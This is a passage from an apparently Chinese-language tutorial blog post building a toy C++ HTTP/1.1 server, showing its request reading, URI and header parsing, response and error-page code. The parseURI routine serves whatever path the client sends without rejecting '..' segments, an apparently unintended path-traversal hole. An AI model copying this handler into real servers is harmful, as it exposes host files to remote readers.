ERR_CONNECTION_CLOSED,          <span class="comment">// 远程连接已关闭</span></span><br><span class="line">    ERR_BAD_REQUEST,                <span class="comment">// 用户的请求包中存在错误,无法解析  </span></span><br><span class="line">    ERR_SEND_RESPONSE_FAIL          <span class="comment">// 响应包发送失败</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>除了第一种 <code>ERR_SUCCESS</code> 表示<strong>无错误</strong>以外，其余的错误类型都有对应的错误处理方式，例如<strong>终止连接</strong>或者<strong>向客户端发送一个特定的响应报文</strong>，我们将在下面的内容中提到这些错误处理方式。</p><h3 id="4-读取请求数据">4. 读取请求数据</h3><p>当远程客户端发送数据至服务器端时，无论传来的是什么数据，首先要做的就是将数据从缓存中读取并保存至自己的缓冲区内。读取时需要明确一点：使用<strong>阻塞方式</strong>读取。因为每个客户端连接都是由单独的线程进行处理的，倘若服务器端没有将所有的请求数据全部读完，那么自然就无法继续执行下去。</p><p>同时还需要明确一点的是，调用 readn 函数读取数据时，有可能客户端传来的数据较多，使得读取到的字节数刚好等于传入 readn 的最大缓冲区大小，那么此时就必须保存并继续循环读取，因为这里可能还有一部分数据没有读取完成，仍然需要继续读取。只有当 readn 函数返回的值小于传入的最大缓冲区大小，才能说明来自客户端的数据已经全部读取完成。此时就可以退出<em>读取请求函数</em>。</p><p>最后，readn 函数可能会因为出错、远程连接中断等意外情况返回负数，因此这里需要额外写一点错误处理，返回对应原因的错误枚举 ERR_READ_REQUEST_FAIL 或者 ERR_CONNECTION_CLOSED 等等。</p><p>综上所述，最终实现的代码如下所示：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">HttpHandler::ERROR_TYPE <span class="title">HttpHandler::readRequest</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// 清除之前的数据</span></span><br><span class="line">    request_.<span class="built_in">clear</span>();</span><br><span class="line">    pos_ = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    <span class="type">char</span> buffer[MAXBUF];</span><br><span class="line">    </span><br><span class="line">    <span class="comment">// 循环阻塞读取 ------------------------------------------</span></span><br><span class="line">    <span class="keyword">for</span>(;;)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="type">ssize_t</span> len = <span class="built_in">readn</span>(client_fd_, buffer, MAXBUF, <span class="literal">true</span>, <span class="literal">true</span>);</span><br><span class="line">        <span class="keyword">if</span>(len &lt; <span class="number">0</span>)</span><br><span class="line">            <span class="keyword">return</span> ERR_READ_REQUEST_FAIL;</span><br><span class="line">        <span class="comment">/** </span></span><br><span class="line"><span class="comment">         * 如果此时没读取到信息并且之前已经读取过信息了,则直接返回.</span></span><br><span class="line"><span class="comment">         * 这里需要注意,有些连接可能会提前连接过来,但是不会马上发送数据.因此需要阻塞等待</span></span><br><span class="line"><span class="comment">         * 这里有个坑点: chromium在每次刷新过后,会额外开一个连接,用来缩短下次发送请求的时间</span></span><br><span class="line"><span class="comment">         * 也就是说这里大概率会出现空连接,即连接到了,但是不会马上发送数据,而是等下一次的请求.</span></span><br><span class="line"><span class="comment">         * </span></span><br><span class="line"><span class="comment">         * 如果读取到的字节数为0,则说明远程连接已经被关闭.</span></span><br><span class="line"><span class="comment">         */</span></span><br><span class="line">        <span class="keyword">else</span> <span class="keyword">if</span>(len == <span class="number">0</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="comment">// 对于已经读取完所有数据的这种情况</span></span><br><span class="line">            <span class="keyword">if</span>(request_.<span class="built_in">length</span>() &gt; <span class="number">0</span>)</span><br><span class="line">                <span class="comment">// 直接停止读取</span></span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            <span class="comment">// 如果此时既没读取到数据,之前的 request_也为空,则表示远程连接已经被关闭</span></span><br><span class="line">            <span class="keyword">else</span></span><br><span class="line">                <span class="keyword">return</span> ERR_CONNECTION_CLOSED;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 将读取到的数据组装起来</span></span><br><span class="line">        <span class="function">string <span class="title">request</span><span class="params">(buffer, buffer + len)</span></span>;</span><br><span class="line">        request_ += request;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 由于当前的读取方式为阻塞读取,因此如果读取到的数据已经全部读取完成,则直接返回</span></span><br><span class="line">        <span class="keyword">if</span>(<span class="built_in">static_cast</span>&lt;<span class="type">size_t</span>&gt;(len) &lt; MAXBUF)</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> ERR_SUCCESS;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="5-解析URI">5. 解析URI</h3><p>接下来是 HTTP 请求报文的解析，我们先简单看看 请求报文的格式：</p><p><img src="/2021/05/WebServer-1/image-20210507204906032.png" alt="image-20210507204906032"></p><p>首先，我们需要从报文中获取第一个以 <code>\r\n</code>结尾的行，并从这行中解析出<strong>请求方法</strong>、<strong>目标URL</strong>以及<strong>HTTP版本</strong>。任何一种因为错误报文格式所导致的解析失败，都是 ERR_BAD_REQUEST 错误。</p><p>其次，目前 WebServer-1.0 版本只支持 GET 的请求方法，倘若识别到其他请求方法都会返回 ERR_NOT_IMPLEMENTED 错误。</p><p>由于请求 URL 可能是一个文件夹地址，而不是文件。因此如果URL指向的是一个文件夹，那么我们就必须在这个URL地址后添加<code>/index.html</code>字符串，使得请求的目标地址一定是一个文件（即便该文件可能不存在）。</p><p>最后，目前的 WebServer-1.0版本只支持 HTTP/1.0 和 HTTP/1.1 版本，因此如果识别到了其他的 HTTP版本，则马上返回 ERR_HTTP_VERSION_NOT_SUPPORTED 错误。</p><p>综上所述，最后实现的代码如下所示：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">HttpHandler::ERROR_TYPE <span class="title">HttpHandler::parseURI</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(request_.<span class="built_in">empty</span>())   <span class="keyword">return</span> ERR_BAD_REQUEST;</span><br><span class="line"></span><br><span class="line">    <span class="type">size_t</span> pos1, pos2;</span><br><span class="line">    </span><br><span class="line">    pos1 = request_.<span class="built_in">find</span>(<span class="string">&quot;\r\n&quot;</span>);</span><br><span class="line">    <span class="keyword">if</span>(pos1 == string::npos)    <span class="keyword">return</span> ERR_BAD_REQUEST;</span><br><span class="line">    string&amp;&amp; first_line = request_.<span class="built_in">substr</span>(<span class="number">0</span>, pos1);</span><br><span class="line">    <span class="comment">// a. 查找get</span></span><br><span class="line">    pos1 = first_line.<span class="built_in">find</span>(<span class="string">&#x27; &#x27;</span>);</span><br><span class="line">    <span class="keyword">if</span>(pos1 == string::npos)    <span class="keyword">return</span> ERR_BAD_REQUEST;</span><br><span class="line">    method_ = first_line.<span class="built_in">substr</span>(<span class="number">0</span>, pos1);</span><br><span class="line"></span><br><span class="line">    string output_method = <span class="string">&quot;Method: &quot;</span>;</span><br><span class="line">    <span class="keyword">if</span>(method_ == <span class="string">&quot;GET&quot;</span>)</span><br><span class="line">        output_method += <span class="string">&quot;GET&quot;</span>;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">        <span class="keyword">return</span> ERR_NOT_IMPLEMENTED;</span><br><span class="line">    <span class="built_in">LOG</span>(INFO) &lt;&lt; output_method &lt;&lt; endl;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// b. 查找目标路径</span></span><br><span class="line">    pos1++;</span><br><span class="line">    pos2 = first_line.<span class="built_in">find</span>(<span class="string">&#x27; &#x27;</span>, pos1);</span><br><span class="line">    <span class="keyword">if</span>(pos2 == string::npos)    <span class="keyword">return</span> ERR_BAD_REQUEST;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 获取path时,注意去除 path 中的第一个斜杠</span></span><br><span class="line">    pos1++;</span><br><span class="line">    path_ = first_line.<span class="built_in">substr</span>(pos1, pos2 - pos1);</span><br><span class="line">    <span class="comment">// 如果 path 为空,则添加一个 . 表示当前文件夹</span></span><br><span class="line">    <span class="keyword">if</span>(path_.<span class="built_in">length</span>() == <span class="number">0</span>)</span><br><span class="line">        path_ += <span class="string">&quot;.&quot;</span>;</span><br><span class="line">    </span><br><span class="line">    <span class="comment">// 判断目标路径是否是文件夹</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">stat</span> st;</span><br><span class="line">    <span class="keyword">if</span>(<span class="built_in">stat</span>(path_.<span class="built_in">c_str</span>(), &amp;st) == <span class="number">0</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// 如果试图打开一个文件夹,则添加 index.html</span></span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">S_ISDIR</span>(st.st_mode))</span><br><span class="line">            path_ += <span class="string">&quot;/index.html&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">LOG</span>(INFO) &lt;&lt; <span class="string">&quot;Path: &quot;</span> &lt;&lt; path_ &lt;&lt; endl;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// c. 查看HTTP版本</span></span><br><span class="line">    <span class="comment">// NOTE 这里只支持 HTTP/1.0 和 HTTP/1.1</span></span><br><span class="line">    pos2++;</span><br><span class="line">    http_version_ = first_line.<span class="built_in">substr</span>(pos2, first_line.<span class="built_in">length</span>() - pos2);</span><br><span class="line">    <span class="built_in">LOG</span>(INFO) &lt;&lt; <span class="string">&quot;HTTP Version: &quot;</span> &lt;&lt; http_version_ &lt;&lt; endl;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 检测是否支持客户端 http 版本</span></span><br><span class="line">    <span class="keyword">if</span>(http_version_ != <span class="string">&quot;HTTP/1.0&quot;</span> &amp;&amp; http_version_ != <span class="string">&quot;HTTP/1.1&quot;</span>)</span><br><span class="line">        <span class="keyword">return</span> ERR_HTTP_VERSION_NOT_SUPPORTED;</span><br><span class="line">    <span class="comment">// 设置只在 HTTP/1.1时 允许 持续连接</span></span><br><span class="line">    <span class="keyword">if</span>(http_version_ != <span class="string">&quot;HTTP/1.1&quot;</span>)</span><br><span class="line">        isKeepAlive_ = <span class="literal">false</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 更新pos_</span></span><br><span class="line">    pos_ = first_line.<span class="built_in">length</span>() + <span class="number">2</span>;</span><br><span class="line">    <span class="keyword">return</span> ERR_SUCCESS;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="6-解析-HTTP-header">6. 解析 HTTP header</h3><p>从HTTP报文第二行开始，每个以 <code>\r\n</code>为结尾的一行数据中，都有一个 <code>key: value</code>的键值对（header最后一行除外）。因此我们需要继续遍历请求报文的数据，将每个 HTTP header 存入数据结构中。如果解析报文的时候出现错误，则返回 ERR_BAD_REQUEST 错误。</p><p>这里有个点需要注意：HTTP/1.1默认支持<strong>持续连接</strong>，因此 HttpHandler 的成员变量 isKeepAlive_ 默认为 true。但如果客户端中存在这样的 http header <code>Connection: close</code>，则说明当前连接并非<strong>持续性</strong>的，因此处理完当前 http 请求后必须马上断开连接。所以当我们接收到了<code>Connection: close</code>这样的http header时，必须设置 isKeepAlive_  变量为 false。</p><p>综上所述，最终实现的代码如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">HttpHandler::ERROR_TYPE <span class="title">HttpHandler::parseHttpHeader</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// 清除之前的 http header</span></span><br><span class="line">    headers_.<span class="built_in">clear</span>();</span><br><span class="line"></span><br><span class="line">    <span class="type">size_t</span> pos1, pos2;</span><br><span class="line">    <span class="keyword">for</span>(pos1 = pos_;</span><br><span class="line">        (pos2 = request_.<span class="built_in">find</span>(<span class="string">&quot;\r\n&quot;</span>, pos1)) != string::npos;</span><br><span class="line">        pos1 = pos2 + <span class="number">2</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        string&amp;&amp; header = request_.<span class="built_in">substr</span>(pos1, pos2 - pos1);</span><br><span class="line">        <span class="comment">// 如果遍历到了空头,则表示http header部分结束</span></span><br><span class="line">        <span class="keyword">if</span>(header.<span class="built_in">size</span>() == <span class="number">0</span>)</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        pos1 = header.<span class="built_in">find</span>(<span class="string">&#x27; &#x27;</span>);</span><br><span class="line">        <span class="keyword">if</span>(pos1 == string::npos)    <span class="keyword">return</span> ERR_BAD_REQUEST;</span><br><span class="line">        <span class="comment">// key处减去1是为了消除key里的最后一个冒号字符</span></span><br><span class="line">        string&amp;&amp; key = header.<span class="built_in">substr</span>(<span class="number">0</span>, pos1 - <span class="number">1</span>);</span><br><span class="line">        <span class="comment">// key 转小写</span></span><br><span class="line">        <span class="built_in">transform</span>(key.<span class="built_in">begin</span>(), key.<span class="built_in">end</span>(), key.<span class="built_in">begin</span>(), ::tolower);</span><br><span class="line">        <span class="comment">// 获取 value</span></span><br><span class="line">        string&amp;&amp; value = header.<span class="built_in">substr</span>(pos1 + <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">        <span class="built_in">LOG</span>(INFO) &lt;&lt; <span class="string">&quot;HTTP Header: [&quot;</span> &lt;&lt; key &lt;&lt; <span class="string">&quot; : &quot;</span> &lt;&lt; value &lt;&lt; <span class="string">&quot;]&quot;</span> &lt;&lt; endl;</span><br><span class="line"></span><br><span class="line">        headers_[key] = value;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 获取header完成后,处理一下 Connection 头</span></span><br><span class="line">    <span class="keyword">auto</span> conHeaderIter = headers_.<span class="built_in">find</span>(<span class="string">&quot;connection&quot;</span>);</span><br><span class="line">    <span class="keyword">if</span>(conHeaderIter != headers_.<span class="built_in">end</span>())</span><br><span class="line">    &#123;</span><br><span class="line">        string value = conHeaderIter-&gt;second;</span><br><span class="line">        <span class="built_in">transform</span>(value.<span class="built_in">begin</span>(), value.<span class="built_in">end</span>(), value.<span class="built_in">begin</span>(), ::tolower);</span><br><span class="line">        <span class="keyword">if</span>(value != <span class="string">&quot;keep-alive&quot;</span>)</span><br><span class="line">            isKeepAlive_ = <span class="literal">false</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 判断处理空 header 条目的 \r\n</span></span><br><span class="line">    <span class="keyword">if</span>((request_.<span class="built_in">size</span>() &lt; pos1 + <span class="number">2</span>) || (request_.<span class="built_in">substr</span>(pos1, <span class="number">2</span>) != <span class="string">&quot;\r\n&quot;</span>))</span><br><span class="line">        <span class="keyword">return</span> ERR_BAD_REQUEST;</span><br><span class="line"></span><br><span class="line">    pos_ = pos1 + <span class="number">2</span>;</span><br><span class="line">    <span class="keyword">return</span> ERR_SUCCESS;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="7-发送响应报文">7. 发送响应报文</h3><p>http响应报文格式如下所示：</p><p><img src="/2021/05/WebServer-1/image-20210507205312687.png" alt="image-20210507205312687"></p><p>照着这个报文格式，照葫芦画瓢构建一个报文并将其发送至客户端即可。</p><p>这里要注意一点，当前连接是否继续保持<strong>取决于 isKeepAlive_ 变量</strong>。具体实现如下所示：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">HttpHandler::ERROR_TYPE <span class="title">HttpHandler::sendResponse</span><span class="params">(<span class="type">const</span> string&amp; responseCode, <span class="type">const</span> string&amp; responseMsg, </span></span></span><br><span class="line"><span class="params"><span class="function">                            <span class="type">const</span> string&amp; responseBodyType, <span class="type">const</span> string&amp; responseBody)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    stringstream sstream;</span><br><span class="line">    sstream &lt;&lt; <span class="string">&quot;HTTP/1.1&quot;</span> &lt;&lt; <span class="string">&quot; &quot;</span> &lt;&lt; responseCode &lt;&lt; <span class="string">&quot; &quot;</span> &lt;&lt; responseMsg &lt;&lt; <span class="string">&quot;\r\n&quot;</span>;</span><br><span class="line">    sstream &lt;&lt; <span class="string">&quot;Connection: &quot;</span> &lt;&lt; (isKeepAlive_ ? <span class="string">&quot;Keep-Alive&quot;</span> : <span class="string">&quot;Close&quot;</span>) &lt;&lt; <span class="string">&quot;\r\n&quot;</span>;</span><br><span class="line">    sstream &lt;&lt; <span class="string">&quot;Server: WebServer/1.0&quot;</span> &lt;&lt; <span class="string">&quot;\r\n&quot;</span>;</span><br><span class="line">    sstream &lt;&lt; <span class="string">&quot;Content-length: &quot;</span> &lt;&lt; responseBody.<span class="built_in">size</span>() &lt;&lt; <span class="string">&quot;\r\n&quot;</span>;</span><br><span class="line">    sstream &lt;&lt; <span class="string">&quot;Content-type: &quot;</span> &lt;&lt; responseBodyType &lt;&lt; <span class="string">&quot;\r\n&quot;</span>;</span><br><span class="line">    sstream &lt;&lt; <span class="string">&quot;\r\n&quot;</span>;</span><br><span class="line">    sstream &lt;&lt; responseBody;</span><br><span class="line"></span><br><span class="line">    string&amp;&amp; response = sstream.<span class="built_in">str</span>();</span><br><span class="line">    <span class="type">ssize_t</span> len = <span class="built_in">writen</span>(client_fd_, (<span class="type">void</span>*)response.<span class="built_in">c_str</span>(), response.<span class="built_in">size</span>());</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 输出返回的数据</span></span><br><span class="line">    <span class="built_in">LOG</span>(INFO) &lt;&lt; <span class="string">&quot;&lt;&lt;&lt;&lt;- Response Packet -&gt;&gt;&gt;&gt; &quot;</span> &lt;&lt; endl;</span><br><span class="line">    <span class="built_in">LOG</span>(INFO) &lt;&lt; <span class="string">&quot;&#123;&quot;</span> &lt;&lt; <span class="built_in">escapeStr</span>(response) &lt;&lt; <span class="string">&quot;&#125;&quot;</span> &lt;&lt; endl;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(len &lt; <span class="number">0</span> || <span class="built_in">static_cast</span>&lt;<span class="type">size_t</span>&gt;(len) != response.<span class="built_in">size</span>())</span><br><span class="line">        <span class="keyword">return</span> ERR_SEND_RESPONSE_FAIL;</span><br><span class="line">    <span class="keyword">return</span> ERR_SUCCESS;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="8-错误处理">8. 错误处理</h3><p>当 handlerError 错误处理函数被调用时，在该函数内部将简单构建一个 html 错误提示页面，并将该页面发送至远程客户端。具体实现如下所示：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">HttpHandler::ERROR_TYPE <span class="title">HttpHandler::handleError</span><span class="params">(<span class="type">const</span> string&amp; errCode, <span class="type">const</span> string&amp; errMsg)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    string errStr = errCode + <span class="string">&quot; &quot;</span> + errMsg;</span><br><span class="line">    string responseBody = </span><br><span class="line">                <span class="string">&quot;&lt;html&gt;&quot;</span></span><br><span class="line">                <span class="string">&quot;&lt;title&gt;&quot;</span> + errStr + <span class="string">&quot;&lt;/title&gt;&quot;</span></span><br><span class="line">                <span class="string">&quot;&lt;body&gt;&quot;</span> + errStr + </span><br><span class="line">                    <span class="string">&quot;&lt;hr&gt;&lt;em&gt; Kiprey&#x27;s Web Server&lt;/em&gt;&quot;</span></span><br><span class="line">                <span class="string">&quot;&lt;/body&gt;&quot;</span></span><br><span class="line">                <span class="string">&quot;&lt;/html&gt;&quot;</span>;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">sendResponse</span>(errCode, errMsg, <span class="string">&quot;text/html&quot;</span>, responseBody);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="9-事件循环（重要）">9. 事件循环（重要）</h3><p>HttpHandler 中的 RunEventLoop 函数维护了整个连接的事件循环。具体操作如下：</p><ul><li>首先，由于 HTTP/1.1 协议支持 持续连接，因此控制流将会进入一个 while 循环，循环进行<strong>读取请求并发送响应</strong>这样的过程。</li><li>while 循环内部中，首先读取来自客户端的数据，之后进行 URI 与 http header 的解析。如果上面中任何一步存在错误，则发送对应的错误页面给客户端，或者退出循环断开连接。</li><li>如果上述步骤没有错误，则打开目标文件，将文件数据通过 mmap 函数映射到内存，读取并发送至远程客户端。而如果目标文件不存在，则返回 404 错误；文件映射失败则返回 500 错误。</li><li>最后返回 while 循环头部，继续等待新的请求报文。</li></ul><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">HttpHandler::RunEventLoop</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    ERROR_TYPE err_ty;</span><br><span class="line">    <span class="built_in">LOG</span>(INFO) &lt;&lt; <span class="string">&quot;------------------- New Connection -------------------&quot;</span> &lt;&lt; endl;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 输出连接</span></span><br><span class="line">    <span class="built_in">printConnectionStatus</span>();</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 持续连接</span></span><br><span class="line">    <span class="keyword">while</span>(isKeepAlive_)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">LOG</span>(INFO) &lt;&lt; <span class="string">&quot;&lt;&lt;&lt;&lt;- Request Packet -&gt;&gt;&gt;&gt; &quot;</span> &lt;&lt; endl;</span><br><span class="line">        <span class="comment">// 从socket读取请求数据, 如果读取失败,或者断开连接</span></span><br><span class="line">        <span class="comment">// NOTE 这里的 readRequest 必须完整读取整个 http 报文</span></span><br><span class="line">        <span class="keyword">if</span>((err_ty = <span class="built_in">readRequest</span>()) != ERR_SUCCESS)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">if</span>(err_ty == ERR_READ_REQUEST_FAIL)</span><br><span class="line">                <span class="built_in">LOG</span>(ERROR) &lt;&lt; <span class="string">&quot;Read request failed ! &quot;</span> &lt;&lt; <span class="built_in">strerror</span>(errno) &lt;&lt; endl;</span><br><span class="line">            <span class="keyword">else</span> <span class="keyword">if</span>(err_ty == ERR_CONNECTION_CLOSED)</span><br><span class="line">                <span class="built_in">LOG</span>(INFO) &lt;&lt; <span class="string">&quot;Socket(&quot;</span> &lt;&lt; client_fd_ &lt;&lt; <span class="string">&quot;) was closed.&quot;</span> &lt;&lt; endl;</span><br><span class="line">            <span class="keyword">else</span></span><br><span class="line">                <span class="built_in">assert</span>(<span class="number">0</span> &amp;&amp; <span class="string">&quot;UNREACHABLE&quot;</span>);       </span><br><span class="line">            <span class="comment">// 断开连接     </span></span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="built_in">LOG</span>(INFO) &lt;&lt; <span class="string">&quot;&#123;&quot;</span> &lt;&lt; <span class="built_in">escapeStr</span>(request_) &lt;&lt; <span class="string">&quot;&#125;&quot;</span> &lt;&lt; endl;</span><br><span class="line">        </span><br><span class="line">        <span class="comment">// 解析信息 ------------------------------------------</span></span><br><span class="line">        <span class="built_in">LOG</span>(INFO) &lt;&lt; <span class="string">&quot;&lt;&lt;&lt;&lt;- Request Info -&gt;&gt;&gt;&gt; &quot;</span> 